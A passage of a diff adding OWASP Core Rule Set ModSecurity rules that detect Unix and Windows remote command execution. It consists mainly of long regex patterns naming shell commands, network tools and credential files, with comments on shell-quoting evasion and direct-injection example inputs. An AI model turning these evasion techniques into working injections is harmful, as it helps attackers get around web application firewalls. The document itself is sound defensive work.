&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)|f[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dg]|g[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?
\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[&,<>\|]|(?:[\--\.0-9A-Z_a-z][\"'\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?)+[\s\v&,<>\|]).*|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?g)|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:s|z[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:4|[\s\v&\),<>\|].*))|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z)|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*)?|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|(?:e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|(?:s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?h)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n)|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\
-0-9\?-@_a-\{]*)?\x5c?3[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m)\b" \
+ "id:932230,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,\
+ msg:'Remote Command Execution: Unix Command Injection (2-3 chars)',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-shell',\
+ tag:'platform-unix',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
+ tag:'PCI/6.5.2',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+# [ Unix command injection ]
+#
+# This is the base Rule to prevent Unix Command Injection
+# for prefix + more than 4 characters.
+#
+# Rule relations:
+#
+# .932230 (base rule, PL1, targets prefix + two and three character commands)
+# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command)
+# ..932232 (stricter sibling, PL3, targets prefix + additional command words)
+# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion)
+#
+# .932250 (base rule, PL1, targets two and three character commands)
+# .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+#
+# .932240 (generic detection, PL2, targets generic evasion attempts)
+# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
+# - with and without prefix
+# - words of any length)
+# ..932239 (sibling of 932236, PL2,
+# - with and without prefix
+# - words of any length
+# - targets request headers user-agent and referer only
+# - excluded words: known user-agents)
+# ..932238 (stricter sibling of 932236, PL3,
+# - no excluded words)
+# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+# - targets request headers user-agent and referer only
+# - without prefix
+# - with word boundaries
+# - words of any
length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932235.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932235 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:HEAD|POST|y(?:arn|elp))[\s\v&\)<>\|]|a(?:dd(?:group|user)|getty|l(?:ias|pine)[\s\v&\)<>\|]|nsible-playbook|pt(?:-get|itude[\s\v&\)<>\|])|r(?:ch[\s\v&\)<>\|]|ia2c)|s(?:cii(?:-xfr|85)|pell)|tobm|xel)|b(?:a(?:s(?:e(?:32|64|n(?:ame[\s\v&\)<>\|]|c))|h[\s\v&\)<>\|])|tch[\s\v&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\v&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu)|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more))|c(?:a(?:ncel|psh)[\s\v&\)<>\|]|ertbot|h(?:attr|(?:dir|root)[\s\v&\)<>\|]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\v&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\v&\)<>\|]|w(?:say|think))|p(?:an|io|ulimit)|r(?:ash[\s\v&\)<>\|]|on(?:tab)?)|s(?:plit|vtool)|u(?:psfilter|rl[\s\v&\)<>\|]))|d(?:(?:a(?:sh|te)|i(?:alog|ff))[\s\v&\)<>\|]|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v&\)<>\|]|sbox)|pkg|vips)|e(?:2fsck|(?:asy_instal|va)l|cho[\s\v&\)<>\|]|fax|grep|macs|n(?:d(?:if|sw)|v-update)|sac|x(?:ec[\s\v&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v&\)<>\|]|r)))
|f(?:acter|(?:etch|lock|unction)[\s\v&\)<>\|]|grep|i(?:le(?:[\s\v&\)<>\|]|test)|(?:n(?:d|ger)|sh)[\s\v&\)<>\|])|o(?:ld[\s\v&\)<>\|]|reach)|ping|tp(?:stats|who))|g(?:awk[\s\v&\)<>\|]|core|e(?:ni(?:e[\s\v&\)<>\|]|soimage)|tfacl[\s\v&\)<>\|])|hci|i(?:mp[\s\v&\)<>\|]|nsh)|r(?:ep[\s\v&\)<>\|]|oup(?:[\s\v&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:ash|i(?:ghlight|story))[\s\v&\)<>\|]|e(?:ad[\s\v&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:conv|f(?:config|top)|nstall[\s\v&\)<>\|]|onice|p(?:6?tables|config)|spell)|j(?:ava[\s\v&\)<>\|]|exec|o(?:(?:bs|in)[\s\v&\)<>\|]|urnalctl)|runscript)|k(?:ill(?:[\s\v&\)<>\|]|all)|nife[\s\v&\)<>\|]|sshell)|l(?:a(?:st(?:[\s\v&\)<>\|]|comm|log(?:in)?)|tex[\s\v&\)<>\|])|dconfig|ess(?:[\s\v&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|(?:inks|ynx)[\s\v&\)<>\|]|o(?:(?:ca(?:l|te)|ok)[\s\v&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)|trace|ua(?:la)?tex|wp-(?:d(?:ownload|ump)|mirror|request)|z(?:4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore)))|m(?:a(?:il(?:[\s\v&\)<>q\|]|x[\s\v&\)<>\|])|ke[\s\v&\)<>\|]|ster\.passwd|wk)|k(?:dir[\s\v&\)<>\|]|fifo|nod|temp)|locate|o(?:(?:re|unt)[\s\v&\)<>\|]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|utt[\s\v&\)<>\|]|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:a(?:no[\s\v&\)<>\|]|sm|wk)|c(?:\.(?:openbsd|traditional)|at)|e(?:ofetch|t(?:(?:c|st)at|kit-ftp|plan))|(?:ice|ull)[\s\v&\)<>\|]|map|o(?:de[\s\v&\)<>\|]|hup)|ping|roff|s(?:enter|lookup|tat))|o(?:ctave[\s\v&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:cman|rted|tch)[\s\v&\)<>\|]|s(?:swd|te[\s\v&\)<>\|]))|d(?:f(?:la)?tex|ksh)|er(?:f|l(?:5|sh)?|ms[\s\v&\)<>\|])|(?:ft|gre)p|hp(?:-cgi|[57])|i(?:(?:co|ng)[\s\v&\)<>\|]|dstat|gz)|k(?:exec|g_?info|ill)|opd|rint(?:env|f[\s\v&\)<>\|])|s(?:ed|ftp|ql)|tar(?:diff|grep)?|u(?:ppet[\s\v&\)<>\|]|shd)|wd\.db|ython[^\s\v])|r(?:ak(?:e[\s\v&\)<>\|]|u)|bash|e(?:a(?:delf|lpath)|(?:dcarpet|name|p(?:eat|lace))[\s\v&\)<>\|]|stic)|l(?:ogin|wrap)|m
(?:dir[\s\v&\)<>\|]|user)|nano|oute[\s\v&\)<>\|]|pm(?:db|(?:quer|verif)y)|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:(?:ash|nap)[\s\v&\)<>\|]|c(?:hed|r(?:een|ipt)[\s\v&\)<>\|])|diff|e(?:(?:lf|rvice)[\s\v&\)<>\|]|ndmail|t(?:arch|env|facl[\s\v&\)<>\|]|sid))|ftp|h(?:\.distrib|(?:adow|ells)[\s\v&\)<>\|]|u(?:f|tdown[\s\v&\)<>\|]))|l(?:eep[\s\v&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v&\)<>\|])|p(?:lit[\s\v&\)<>\|]|wd\.db)|qlite3|sh(?:-key(?:ge|sca)n|pass)|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\v&\)<>\|]))|udo|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:il[\s\v&\)<>f\|]|sk(?:[\s\v&\)<>\|]|set))|c(?:l?sh|p(?:dump|ing|traceroute))|elnet|ftp|ime(?:(?:out)?[\s\v&\)<>\|]|datectl)|mux|ouch[\s\v&\)<>\|]|r(?:aceroute6?|off)|shark)|u(?:limit[\s\v&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\v&\)<>\|]|expand|iq|l(?:ink[\s\v&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\v&\)<>\|]|std))|p(?:2date[\s\v&\)<>\|]|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:algrind|i(?:ew[\s\v&\)<>\|]|gr|mdiff|pw|rsh)|olatility[\s\v&\)<>\|])|w(?:a(?:ll|tch)[\s\v&\)<>\|]|get|h(?:iptail[\s\v&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\v&\)<>\|]))|x(?:args|e(?:la)?tex|mo(?:dmap|re)|pad|term|z(?:c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more))|z(?:athura|c(?:at|mp)|diff|e(?:grep|ro[\s\v&\)<>\|])|f?grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|less|more|run|s(?:oelim|td(?:(?:ca|m)t|grep|less)?)|ypper))" \ + "id:932235,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection (command without evasion)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + 
setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+# [ Windows PowerShell, cmdlets and options ]
+#
+# Detect some common PowerShell commands, cmdlets and options.
+# These commands should be relatively uncommon in normal text, but
+# potentially useful for code injection.
+#
+# If you are not running Windows, it is safe to disable this rule.
+#
+# https://learn.microsoft.com/en-us/previous-versions/technet-magazine/ff714569(v=msdn.10)
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile windows-powershell-commands.data" \
+ "id:932120,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:cmdLine,\
+ msg:'Remote Command Execution: Windows PowerShell Command Found',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-shell',\
+ tag:'language-powershell',\
+ tag:'platform-windows',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
+ tag:'PCI/6.5.2',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+# [ Windows Powershell cmdlet aliases ]
+#
+# Attempts to detect aliases of the common PowerShell cmdlets in windows-powershell-commands.data
+# If you are not running Windows, it is safe to disable this rule.
+#
+# There are other aliases which are similar to Unix, but they are properly handled by rule 932105
+#
+# Regular expression generated from regex-assembly/932125.ra.
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932125 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:[\n\r;`\{]|\|\|?|&&?)[\s\v]*[\s\v\"'-\(,@]*(?:[\"'\.-9A-Z_a-z]+/|(?:[\"'\x5c\^]*[0-9A-Z_a-z][\"'\x5c\^]*:.*|[ \"'\.-9A-Z\x5c\^-_a-z]*)\x5c)?[\"\^]*(?:(?:a[\"\^]*(?:c|s[\"\^]*n[\"\^]*p)|e[\"\^]*(?:b[\"\^]*p|p[\"\^]*(?:a[\"\^]*l|c[\"\^]*s[\"\^]*v|s[\"\^]*n)|[tx][\"\^]*s[\"\^]*n)|f[\"\^]*(?:[cltw]|o[\"\^]*r[\"\^]*e[\"\^]*a[\"\^]*c[\"\^]*h)|i[\"\^]*(?:[cr][\"\^]*m|e[\"\^]*x|h[\"\^]*y|i|p[\"\^]*(?:a[\"\^]*l|c[\"\^]*s[\"\^]*v|m[\"\^]*o|s[\"\^]*n)|s[\"\^]*e|w[\"\^]*(?:m[\"\^]*i|r))|m[\"\^]*(?:a[\"\^]*n|[dipv]|o[\"\^]*u[\"\^]*n[\"\^]*t)|o[\"\^]*g[\"\^]*v|p[\"\^]*(?:o[\"\^]*p|u[\"\^]*s[\"\^]*h)[\"\^]*d|t[\"\^]*r[\"\^]*c[\"\^]*m|w[\"\^]*j[\"\^]*b)[\"\^]*[\s\v,\.-/;-<>].*|c[\"\^]*(?:(?:(?:d|h[\"\^]*d[\"\^]*i[\"\^]*r|v[\"\^]*p[\"\^]*a)[\"\^]*|p[\"\^]*(?:[ip][\"\^]*)?)[\s\v,\.-/;-<>].*|l[\"\^]*(?:(?:[cipv]|h[\"\^]*y)[\"\^]*[\s\v,\.-/;-<>].*|s)|n[\"\^]*s[\"\^]*n)|d[\"\^]*(?:(?:b[\"\^]*p|e[\"\^]*l|i[\"\^]*(?:f[\"\^]*f|r))[\"\^]*[\s\v,\.-/;-<>].*|n[\"\^]*s[\"\^]*n)|g[\"\^]*(?:(?:(?:(?:a[\"\^]*)?l|b[\"\^]*p|d[\"\^]*r|h[\"\^]*y|(?:w[\"\^]*m[\"\^]*)?i|j[\"\^]*b|[u-v])[\"\^]*|c[\"\^]*(?:[ims][\"\^]*)?|m[\"\^]*(?:o[\"\^]*)?|s[\"\^]*(?:n[\"\^]*(?:p[\"\^]*)?|v[\"\^]*))[\s\v,\.-/;-<>].*|e[\"\^]*r[\"\^]*r|p[\"\^]*(?:(?:s[\"\^]*)?[\s\v,\.-/;-<>].*|v))|l[\"\^]*s|n[\"\^]*(?:(?:a[\"\^]*l|d[\"\^]*r|[iv]|m[\"\^]*o|s[\"\^]*n)[\"\^]*[\s\v,\.-/;-<>].*|p[\"\^]*s[\"\^]*s[\"\^]*c)|r[\"\^]*(?:(?:(?:(?:b[\"\^]*)?p|e[\"\^]*n|(?:w[\"\^]*m[\"\^]*)?i|j[\"\^]*b|n[\"\^]*[ip])[\"\^]*|d[\"\^]*(?:r[\"\^]*)?|m[\"\^]*(?:(?:d[\"\^]*i[\"\^]*r|o)[\"\^]*)?|s[\"\^]*n[\"\^]*(?:p[\"\^]*)?|v[\"\^]*(?:p[\"\^]*a[\"\^]*)?)[\s\v,\.-/;-<>].*|c[\"\^]*(?:j[\"\^]*b[\"\^]*[\s\v,\.-/;-<>].*|s[\"\^]*n)|u[\"\^]*j[\"\^]*b)|s[\"\^]*(?:(?:(?:a[\"
\^]*(?:j[\"\^]*b|l|p[\"\^]*s|s[\"\^]*v)|b[\"\^]*p|[civ]|w[\"\^]*m[\"\^]*i)[\"\^]*|l[\"\^]*(?:s[\"\^]*)?|p[\"\^]*(?:(?:j[\"\^]*b|p[\"\^]*s|s[\"\^]*v)[\"\^]*)?)[\s\v,\.-/;-<>].*|h[\"\^]*c[\"\^]*m|u[\"\^]*j[\"\^]*b))(?:\.[\"\^]*[0-9A-Z_a-z]+)?\b" \
+ "id:932125,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,\
+ msg:'Remote Command Execution: Windows Powershell Alias Command Injection',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-shell',\
+ tag:'platform-windows',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
+ tag:'PCI/6.5.2',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+# [ Unix shell expressions ]
+#
+# Detects the following patterns which are common in Unix shell scripts
+# and one-liners:
+#
+# $(foo) Command substitution
+# ${foo} Parameter expansion
+# <(foo) Process substitution
+# >(foo) Process substitution
+# $((foo)) Arithmetic expansion
+# /e[t]c Shell glob expression to bypass wordlists
+#
+# Regular expression generated from regex-assembly/932130.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 932130
+#
+# This rule has a stricter sibling: 932131 (PL2) that applies the same regex to User-Agent and Referer
+#
+# This rule is essential to defend against the Log4J / Log4Shell attacks (see also rule 944150)
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \$(?:\((?:.*|\(.*\))\)|\{.*\})|[<>]\(.*\)|/[0-9A-Z_a-z]*\[!?.+\]" \
+ "id:932130,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:cmdLine,\
+ msg:'Remote Command Execution: Unix Shell Expression Found',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-shell',\
+ tag:'platform-unix',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
+ tag:'PCI/6.5.2',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+# [ Windows FOR, IF commands ]
+#
+# This rule detects Windows command shell FOR and IF commands.
+# If you are not running Windows, it is safe to disable this rule.
+#
+# Examples:
+#
+# FOR %a IN (set) DO
+# FOR /D %a IN (dirs) DO
+# FOR /F "options" %a IN (text|"text") DO
+# FOR /L %a IN (start,step,end) DO
+# FOR /R C:\dir %A IN (set) DO
+#
+# IF [/I] [NOT] EXIST filename | DEFINED define | ERRORLEVEL n | CMDEXTVERSION n
+# IF [/I] [NOT] item1 [==|EQU|NEQ|LSS|LEQ|GTR|GEQ] item2
+# IF [/I] [NOT] (item1) [==|EQU|NEQ|LSS|LEQ|GTR|GEQ] (item2)
+#
+# http://ss64.com/nt/if.html
+# http://ss64.com/nt/for.html
+#
+# Regular expression generated from regex-assembly/932140.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 932140
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \b(?:for(?:/[dflr].*)? %+[^ ]+ in\(.*\)[\s\v]?do|if(?:/i)?(?: not)?(?: (?:e(?:xist|rrorlevel)|defined|cmdextversion)\b|[ \(].*(?:\b(?:g(?:eq|tr)|equ|neq|l(?:eq|ss))\b|==)))" \
+ "id:932140,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:cmdLine,\
+ msg:'Remote Command Execution: Windows FOR/IF Command Found',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-shell',\
+ tag:'platform-windows',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
+ tag:'PCI/6.5.2',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+# [ Unix direct remote command execution ]
+#
+# Detects Unix commands at the start of a parameter (direct RCE).
+# Example: foo=wget%20www.example.com
+#
+# In this rule we use a different check from command injection (rule 932230), where a
+# command string is appended (injected) to a regular parameter, and then
+# passed to a shell unescaped.
+#
+# Additionaly, we require a trailing space (denoting command parameters) or command
+# separator character after the command.
+#
+# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit:
+# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ]
+#
+# An effort was made to combat evasions by shell quoting (e.g. 'ls',
+# 'l'"s", \l\s are all valid).
ModSecurity has a t:cmdLine
+# transformation built-in to deal with this, but unfortunately, it
+# replaces ';' characters and lowercases the payload, which is less
+# useful for this case. However, emulating the transformation makes
+# the regexp more complex.
+#
+# This is the base Rule to prevent Direct Unix Command Injection
+# without prefix match.
+#
+# Rule relations:
+#
+# .932230 (base rule, PL1, targets prefix + two and three character commands)
+# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command)
+# ..932232 (stricter sibling, PL3, targets prefix + additional command words)
+# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion)
+#
+# .932250 (base rule, PL1, targets two and three character commands)
+# .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+#
+# .932240 (generic detection, PL2, targets generic evasion attempts)
+# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
+# - with and without prefix
+# - words of any length)
+# ..932239 (sibling of 932236, PL2,
+# - with and without prefix
+# - words of any length
+# - targets request headers user-agent and referer only
+# - excluded words: known user-agents)
+# ..932238 (stricter sibling of 932236, PL3,
+# - no excluded words)
+# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+# - targets request headers user-agent and referer only
+# - without prefix
+# - with word boundaries
+# - words of any length
+# - excluded words: known user-agents)
+#
+#
+# Regular expression generated from regex-assembly/932250.ra.
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932250 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 